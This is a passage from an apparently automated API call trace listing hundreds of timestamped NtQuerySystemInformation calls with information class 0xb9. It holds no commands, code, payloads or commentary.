(SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff080, Length=0x38, ResultLength=0x0) [0183.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fefa0, Length=0x28, ResultLength=0x0) [0183.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fefa0, Length=0x28, ResultLength=0x0) [0183.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee40, Length=0x20, ResultLength=0x0) [0183.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fedc0, Length=0x20, ResultLength=0x0) [0183.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fedc0, Length=0x20, ResultLength=0x0) [0183.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fedc0, Length=0x20, ResultLength=0x0) [0183.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff080, Length=0x38, ResultLength=0x0) [0183.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff080, Length=0x38, ResultLength=0x0) [0183.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef00, Length=0x20, ResultLength=0x0) [0183.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee90, Length=0x20, ResultLength=0x0) [0183.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee90, Length=0x20, ResultLength=0x0) [0183.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff260, Length=0x50, ResultLength=0x0) [0183.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff260, Length=0x50, ResultLength=0x0) [0183.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff260, Length=0x50, ResultLength=0x0) [0183.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff150, Length=0x50, ResultLength=0x0) [0183.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff150, Length=0x50, ResultLength=0x0) [0183.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff150, Length=0x50, ResultLength=0x0) [0183.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.613] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff150, Length=0x50, ResultLength=0x0) [0183.613] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.613] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff080, Length=0x38, ResultLength=0x0) [0183.615] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.615] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feeb0, Length=0x28, ResultLength=0x0) [0183.615] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.615] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.615] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feeb0, Length=0x28, ResultLength=0x0) [0183.616] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.616] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.616] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feeb0, Length=0x28, ResultLength=0x0) [0183.616] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.616] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.616] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feeb0, Length=0x28, ResultLength=0x0) [0183.616] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.616] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.616] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef20, Length=0x28, ResultLength=0x0) [0183.616] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.616] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.616] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff080, Length=0x38, ResultLength=0x0) [0183.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fefa0, Length=0x28, ResultLength=0x0) [0183.619] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.619] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.619] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.620] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fefa0, Length=0x28, ResultLength=0x0) [0183.620] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee40, Length=0x20, ResultLength=0x0) [0183.620] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fedc0, Length=0x20, ResultLength=0x0) [0183.620] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.620] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fedc0, Length=0x20, ResultLength=0x0) [0183.620] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.620] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fedc0, Length=0x20, ResultLength=0x0) [0183.620] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.620] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.620] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.620] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.620] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.727] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff080, Length=0x38, ResultLength=0x0) [0183.727] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.727] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff080, Length=0x38, ResultLength=0x0) [0183.727] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef00, Length=0x20, ResultLength=0x0) [0183.727] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee90, Length=0x20, ResultLength=0x0) [0183.727] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.727] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.727] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.727] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee90, Length=0x20, ResultLength=0x0) [0183.727] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.727] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.730] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff260, Length=0x50, ResultLength=0x0) [0183.730] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.730] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff260, Length=0x50, ResultLength=0x0) [0183.730] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.730] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff260, Length=0x50, ResultLength=0x0) [0183.730] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff150, Length=0x50, ResultLength=0x0) [0183.730] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.730] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff150, Length=0x50, ResultLength=0x0) [0183.730] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.730] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff150, Length=0x50, ResultLength=0x0) [0183.731] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.731] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff150, Length=0x50, ResultLength=0x0) [0183.731] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.731] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff080, Length=0x38, ResultLength=0x0) [0183.733] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feeb0, Length=0x28, ResultLength=0x0) [0183.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feeb0, Length=0x28, ResultLength=0x0) [0183.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feeb0, Length=0x28, ResultLength=0x0) [0183.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feeb0, Length=0x28, ResultLength=0x0) [0183.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef20, Length=0x28, ResultLength=0x0) [0183.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff080, Length=0x38, ResultLength=0x0) [0183.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fefa0, Length=0x28, ResultLength=0x0) [0183.737] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.738] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.738] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.738] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fefa0, Length=0x28, ResultLength=0x0) [0183.738] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee40, Length=0x20, ResultLength=0x0) [0183.738] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fedc0, Length=0x20, ResultLength=0x0) [0183.738] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.738] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fedc0, Length=0x20, ResultLength=0x0) [0183.738] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.738] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fedc0, Length=0x20, ResultLength=0x0) [0183.738] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.739] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.739] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.739] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.739] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.739] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff080, Length=0x38, ResultLength=0x0) [0183.739] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.739] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff080, Length=0x38, ResultLength=0x0) [0183.739] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef00, Length=0x20, ResultLength=0x0) [0183.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee90, Length=0x20, ResultLength=0x0) [0183.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee90, Length=0x20, ResultLength=0x0) [0183.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff260, Length=0x50, ResultLength=0x0) [0183.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff260, Length=0x50, ResultLength=0x0) [0183.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff260, Length=0x50, ResultLength=0x0) [0183.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff150, Length=0x50, ResultLength=0x0) [0183.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff150, Length=0x50, ResultLength=0x0) [0183.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff150, Length=0x50, ResultLength=0x0) [0183.744] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.744] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff150, Length=0x50, ResultLength=0x0) [0183.744] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.744] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff080, Length=0x38, ResultLength=0x0) [0183.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feeb0, Length=0x28, ResultLength=0x0) [0183.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feeb0, Length=0x28, ResultLength=0x0) [0183.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feeb0, Length=0x28, ResultLength=0x0) [0183.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feeb0, Length=0x28, ResultLength=0x0) [0183.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef20, Length=0x28, ResultLength=0x0) [0183.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff080, Length=0x38, ResultLength=0x0) [0183.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fefa0, Length=0x28, ResultLength=0x0) [0183.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fefa0, Length=0x28, ResultLength=0x0) [0183.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee40, Length=0x20, ResultLength=0x0) [0183.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fedc0, Length=0x20, ResultLength=0x0) [0183.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fedc0, Length=0x20, ResultLength=0x0) [0183.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fedc0, Length=0x20, ResultLength=0x0) [0183.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff080, Length=0x38, ResultLength=0x0) [0183.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff080, Length=0x38, ResultLength=0x0) [0183.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef00, Length=0x20, ResultLength=0x0) [0183.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee90, Length=0x20, ResultLength=0x0) [0183.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee90, Length=0x20, ResultLength=0x0) [0183.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0183.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feea0, Length=0x20, ResultLength=0x0) [0184.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.265] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.266] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.266] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.266] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.266] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.266] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.266] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff758, Length=0x28, ResultLength=0x0) [0184.266] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, 